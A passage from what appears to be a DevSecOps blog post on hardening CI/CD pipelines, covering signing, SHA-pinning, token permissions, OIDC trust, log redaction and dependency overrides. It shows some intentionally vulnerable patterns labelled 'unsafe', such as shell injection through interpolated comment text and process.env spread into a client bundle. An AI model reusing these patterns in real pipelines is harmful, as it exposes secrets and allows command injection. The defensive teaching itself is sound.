  &lt;span class="nt"&gt;--certificate-github-workflow-repository&lt;/span&gt; &lt;span class="s2"&gt;"yourorg/yourrepo"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-github-workflow-ref&lt;/span&gt; &lt;span class="s2"&gt;"refs/heads/main"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An open &lt;code&gt;^https://github.com/yourorg/&lt;/code&gt; regex matches any workflow under the org including a malicious workflow added in a fork and run via &lt;code&gt;pull_request_target&lt;/code&gt;. Anchor on the workflow path, the ref, AND test the regex with a known-different workflow before relying on it. Unanchored regexes (missing &lt;code&gt;^&lt;/code&gt; or &lt;code&gt;$&lt;/code&gt;) match more workflows than you intended.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Signing alone does not satisfy SLSA&lt;/strong&gt; (Supply-chain Levels for Software Artifacts a framework grading build provenance trustworthiness). The signature proves who built the image, not how. SLSA Build L3 requires provenance attestations in &lt;code&gt;in-toto&lt;/code&gt; format (&lt;code&gt;https://slsa.dev/provenance/v1&lt;/code&gt; predicate), produced by &lt;code&gt;cosign attest --predicate&lt;/code&gt; from a hardened, isolated builder such as &lt;code&gt;slsa-github-generator&lt;/code&gt;. Verify with &lt;code&gt;cosign verify-attestation&lt;/code&gt;. The signature is the foundation. The attestation chain is the rest of the building.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A signature you don't verify at deploy time is theatre.&lt;/strong&gt; Wire &lt;code&gt;cosign verify&lt;/code&gt; into a Kubernetes admission controller &lt;strong&gt;Kyverno&lt;/strong&gt; &lt;code&gt;verifyImages&lt;/code&gt;, &lt;strong&gt;Connaisseur&lt;/strong&gt;, or &lt;strong&gt;Sigstore policy-controller&lt;/strong&gt; so the cluster refuses to schedule unsigned or wrong-identity images. GitHub's native &lt;code&gt;gh attestation verify&lt;/code&gt; (GA 2024) is the simplest verification entry-point if you're not on Kubernetes.&lt;/p&gt;

&lt;p&gt;Stack-agnostic: cosign works on any container image registry (ECR, GHCR, ACR, GAR, Harbor, Artifactory, Quay) and on generic blobs via &lt;code&gt;cosign sign-blob&lt;/code&gt;. Sigstore Fulcio currently trusts OIDC issuers from GitHub, GitLab, Buildkite, CircleCI, Google, Microsoft same &lt;code&gt;cosign sign --identity-token&lt;/code&gt; flow, different &lt;code&gt;iss&lt;/code&gt; claim. PEP 740 attestations + &lt;code&gt;python -m sigstore&lt;/code&gt; cover Python wheels; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; covers Java JARs.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 7: Tag → Commit (What does this &lt;code&gt;uses:&lt;/code&gt; / include / plugin actually point to?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;This is the boundary tj-actions exploited.&lt;/strong&gt; A line like &lt;code&gt;uses: tj-actions/changed-files@v45&lt;/code&gt; resolves at build time to whatever commit the &lt;code&gt;v45&lt;/code&gt; tag currently references. Tags are mutable. Commit SHAs are not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; pin every external &lt;code&gt;uses:&lt;/code&gt; to a 40-character commit SHA with a tag comment.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pulumi/actions@8582a9e8cc630786854029b4e09281acd6794b58&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Enforce in CI with &lt;code&gt;pinact run --check --verify&lt;/code&gt;. It fails the PR if anything is unpinned, and flags drift between the pinned SHA and the SHA the upstream tag currently resolves to. It catches inadvertent drift. It does not by itself defeat a tag-rewrite attack &lt;code&gt;pinact&lt;/code&gt; will surface the mismatch but cannot tell you which side is hostile. Pair it with a higher-trust signal: Sigstore attestation verification, GitHub's &lt;code&gt;gh attestation verify&lt;/code&gt; for Action artifacts (GA 2024), &lt;code&gt;StepSecurity Harden-Runner&lt;/code&gt; for egress-policy + tampering detection on the runner, or human review of any flagged drift.&lt;/p&gt;

&lt;p&gt;When we started, none of our 110 &lt;code&gt;uses:&lt;/code&gt; lines were SHA-pinned. That included &lt;code&gt;pulumi/actions&lt;/code&gt; (cloud-deploy authority), &lt;code&gt;lasith-kg/dispatch-workflow&lt;/code&gt; (single maintainer), &lt;code&gt;aws-actions/configure-aws-credentials&lt;/code&gt; (×11), and &lt;code&gt;docker/build-push-action&lt;/code&gt; (×3, ECR push). They all are now, with a CI gate so they stay that way.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Translate to your CI:&lt;/strong&gt; GitLab &lt;code&gt;include:&lt;/code&gt; should pin &lt;code&gt;ref:&lt;/code&gt; to a SHA, not &lt;code&gt;main&lt;/code&gt;. Buildkite plugins should pin &lt;code&gt;plugin@&amp;lt;sha&amp;gt;&lt;/code&gt;, not &lt;code&gt;@v1&lt;/code&gt;. CircleCI orbs are best inlined or vendored. Jenkins shared libraries should pin &lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;. Bazel modules pin via &lt;code&gt;MODULE.bazel.lock&lt;/code&gt;. The control: no mutable references to third-party code anywhere in CI config.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; any step in a workflow inherits the workflow's permissions and any environment-scoped secrets. A compromised Action running with &lt;code&gt;permissions: write-all&lt;/code&gt; receives a &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; with write scopes across that repository's API surface contents, issues, pull requests, packages, deployments for the duration of that workflow run.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; default-deny at workflow level, grant per-job:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;       &lt;span class="c1"&gt;# for checkout&lt;/span&gt;
      &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;      &lt;span class="c1"&gt;# for AWS OIDC&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;zizmor&lt;/code&gt; (free workflow-security linter) audits this on every PR. When we ran it the first time, 8 of our 16 workflows were running &lt;code&gt;permissions: write-all&lt;/code&gt;. Today none of them do.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reusable workflows (&lt;code&gt;workflow_call&lt;/code&gt;)&lt;/strong&gt; inherit the caller's &lt;code&gt;permissions:&lt;/code&gt; unless explicitly overridden. &lt;code&gt;secrets: inherit&lt;/code&gt; on the caller hands every repository secret to the callee. Pass secrets explicitly by name and re-declare &lt;code&gt;permissions:&lt;/code&gt; in every reusable workflow.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;pull_request_target&lt;/code&gt; is the single highest-severity GitHub Actions footgun.&lt;/strong&gt; Unlike &lt;code&gt;pull_request&lt;/code&gt;, it runs in the context of the base repository with the base repo's &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; and access to repository secrets. If you &lt;code&gt;actions/checkout&lt;/code&gt; the PR head, you've executed an attacker's code with privileged credentials. Default rule: never check out PR head code in a &lt;code&gt;pull_request_target&lt;/code&gt; workflow; never run third-party scripts inside one.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Replace long-lived AWS keys with GitHub OIDC.&lt;/strong&gt; The role's trust policy restricts assumption to your repository's workflows; CI never holds a credential that survives the run. The footgun: a &lt;code&gt;sub&lt;/code&gt; condition like &lt;code&gt;repo:org/*:*&lt;/code&gt; hands AWS-role assumption to any workflow run from any branch, including a fork's PR. Anchor &lt;code&gt;sub&lt;/code&gt; to a specific repo + ref:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"Condition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringEquals"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringLike"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"repo:yourorg/yourrepo:ref:refs/heads/main"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For higher precision than &lt;code&gt;sub&lt;/code&gt;, use &lt;code&gt;job_workflow_ref&lt;/code&gt; it constrains to a specific leaf workflow file and is resilient to a malicious reusable-workflow caller inside the same repo. AWS, GCP Workload Identity Federation, and Azure federated credentials all expose it.&lt;/p&gt;

&lt;p&gt;CI translations: GitLab CI uses &lt;code&gt;id_tokens:&lt;/code&gt; per-job and CI/CD job-token scope allowlists; Buildkite uses agent-queue ACLs and Vault Agent for secret distribution; CircleCI uses restricted contexts; Jenkins uses &lt;code&gt;withCredentials&lt;/code&gt; per-step plus folder-level credential isolation. Different YAML, same default-deny pattern.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 9: Untrusted input → Shell (CWE-78 in CI)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; GitHub-context fields like &lt;code&gt;github.event.comment.body&lt;/code&gt;, &lt;code&gt;pull_request.title&lt;/code&gt;, &lt;code&gt;head_ref&lt;/code&gt; are attacker-controlled. When interpolated directly into a &lt;code&gt;run:&lt;/code&gt; block, they become shell injection. The same class exists everywhere: GitLab &lt;code&gt;$CI_*&lt;/code&gt; from triggered events, Jenkins parameterised builds, Buildkite &lt;code&gt;meta-data&lt;/code&gt;, Azure &lt;code&gt;variables&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Unsafe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;BODY&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.event.comment.body }}&lt;/span&gt;
&lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;echo "Reviewing&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;$BODY"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the boundary the lede sat on. The fix was a four-line diff. The control that catches the next one (&lt;code&gt;actionlint&lt;/code&gt; for syntax + &lt;code&gt;zizmor&lt;/code&gt; for security patterns, both as required PR checks) was one commit. Cross-CI: &lt;code&gt;semgrep --config=p/ci&lt;/code&gt; covers most major vendors with one ruleset.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 3 Runtime-side: what ships and what leaks
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; a &lt;code&gt;define&lt;/code&gt; block in your bundler (Vite, Webpack, esbuild, Rollup) that spreads &lt;code&gt;process.env&lt;/code&gt; into the client bundle. Frontend bundlers replace &lt;code&gt;process.env.X&lt;/code&gt; with the value at build time, so whatever was in the build host's env becomes a string literal in the JS shipped to every browser.&lt;/p&gt;

&lt;p&gt;We had this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// vite.config.ts&lt;/span&gt;
&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// TODO: fix this later&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Safe:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="nx"&gt;define&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;process.env.PUBLIC_API_URL&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;PUBLIC_API_URL&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="c1"&gt;// explicit allowlist; nothing implicit&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same principle for &lt;code&gt;NEXT_PUBLIC_*&lt;/code&gt;, &lt;code&gt;VITE_*&lt;/code&gt;, &lt;code&gt;REACT_APP_*&lt;/code&gt;, &lt;code&gt;EXPO_PUBLIC_*&lt;/code&gt; env vars assume browser-readable, never put secrets behind these prefixes. Same failure mode in mobile too: Android &lt;code&gt;BuildConfig.API_KEY = "$apiKey"&lt;/code&gt; from a checked-in &lt;code&gt;gradle.properties&lt;/code&gt;; iOS API keys in &lt;code&gt;Info.plist&lt;/code&gt; or &lt;code&gt;xcconfig&lt;/code&gt;. Assume any string in the artefact is extractable.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; logging frameworks default to verbose. CloudWatch, Datadog, Sentry retain log lines for weeks. A &lt;code&gt;console.log(req)&lt;/code&gt; in a request handler dumps the &lt;code&gt;Authorization&lt;/code&gt; header to a 30-day-retention log, accessible to any engineer with read access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; redaction at the framework level (not per call-site):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="nx"&gt;pino&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;pino&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;logger&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;pino&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;redact&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;req.headers.cookie&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;config.headers.authorization&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// catches Axios errors&lt;/span&gt;
      &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.password&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.token&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;*.secret&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="na"&gt;censor&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;[REDACTED]&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The one that bit us: AxiosError objects carry the original request configuration, including &lt;code&gt;Authorization&lt;/code&gt; headers. &lt;code&gt;logger.error(msg, axiosErr)&lt;/code&gt; without redaction quietly dumps every bearer token your service has ever forwarded.&lt;/p&gt;

&lt;p&gt;Every mature logger has the primitive: &lt;code&gt;structlog&lt;/code&gt; processors (Python), &lt;code&gt;logback&lt;/code&gt;'s &lt;code&gt;MaskingPatternLayout&lt;/code&gt; (Java), &lt;code&gt;zap&lt;/code&gt; / &lt;code&gt;zerolog&lt;/code&gt; field hooks (Go), &lt;code&gt;tracing&lt;/code&gt; field filters (Rust), &lt;code&gt;Rails.config.filter_parameters&lt;/code&gt; (Ruby), &lt;code&gt;Serilog.Enrichers.Sensitive&lt;/code&gt; (.NET). Last line of defence regardless of stack: an &lt;strong&gt;OpenTelemetry Collector&lt;/strong&gt; with an &lt;code&gt;attributes/delete&lt;/code&gt; processor that scrubs in transit before logs reach Datadog or CloudWatch.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The limit.&lt;/strong&gt; &lt;code&gt;pino&lt;/code&gt; redact is a denylist; it only scrubs the paths you list. Custom auth headers (&lt;code&gt;x-api-key&lt;/code&gt;, &lt;code&gt;x-vault-token&lt;/code&gt;), GraphQL &lt;code&gt;variables.password&lt;/code&gt;, &lt;code&gt;request.body.token&lt;/code&gt;, provider-specific shapes easy to miss. Audit your redact paths against the actual headers and body shapes your services see, and re-audit when you add an integration.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 12: Dependency → Patch (Can you fix a CVE without a registry round-trip?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; vulnerable transitive dependency, no maintainer response, can't wait.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; force-pin the transitive with documented rationale and an expiry date:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"overrides"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"lodash-es"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"4.17.23"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"tar"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"7.5.11"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every package manager has the primitive: npm &lt;code&gt;overrides&lt;/code&gt;, yarn &lt;code&gt;resolutions&lt;/code&gt;, pip &lt;code&gt;constraints.txt&lt;/code&gt;, Poetry direct-promotion, uv &lt;code&gt;[tool.uv] override-dependencies&lt;/code&gt;, Maven &lt;code&gt;&amp;lt;dependencyManagement&amp;gt;&lt;/code&gt;, Gradle &lt;code&gt;resolutionStrategy.force&lt;/code&gt;, Cargo &lt;code&gt;[patch.crates-io]&lt;/code&gt;, Go &lt;code&gt;replace&lt;/code&gt;, Bundler direct gem pin, NuGet central package management.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Override-rot is real&lt;/strong&gt; outdated overrides shadow newer transitive versions that already have the fix. Each override should reference its CVE, the introducing PR, and a re-evaluation date. The &lt;code&gt;audit-allowlist.json&lt;/code&gt; schema we use:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"ghsa"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"GHSA-xxxx-yyyy-zzzz"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"package"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"the affected package"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"severity"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"high | critical"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"rationale"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"why this risk is accepted (must explain reachability or absence of fix)"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"verified_by"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"engineer email or handle"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"added"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"expires"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YYYY-MM-DD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;max&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;90&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;days&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"follow_up"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"what removes this entry"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;CI fails when &lt;code&gt;expires&lt;/code&gt; passes; the gate forces a re-decision rather than letting drift accumulate.&lt;/p&gt;




&lt;h2&gt;
  
  
  When prevention fails: the response side
&lt;/h2&gt;

&lt;p&gt;Every boundary above is preventive. Some will fail. The question is what you do in the next four hours.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Forensic record.&lt;/strong&gt; Retain CI build logs for at least 90 days, forwarded to an immutable sink (S3 with object lock, or a logging platform with retention). Without this, "did the malicious axios version run for us during the window?" is unanswerable. GitHub-hosted runners are ephemeral; once a job finishes, the host is gone. Pre-configure log shipping and an artifact upload of suspicious-run state.&lt;/p&gt;

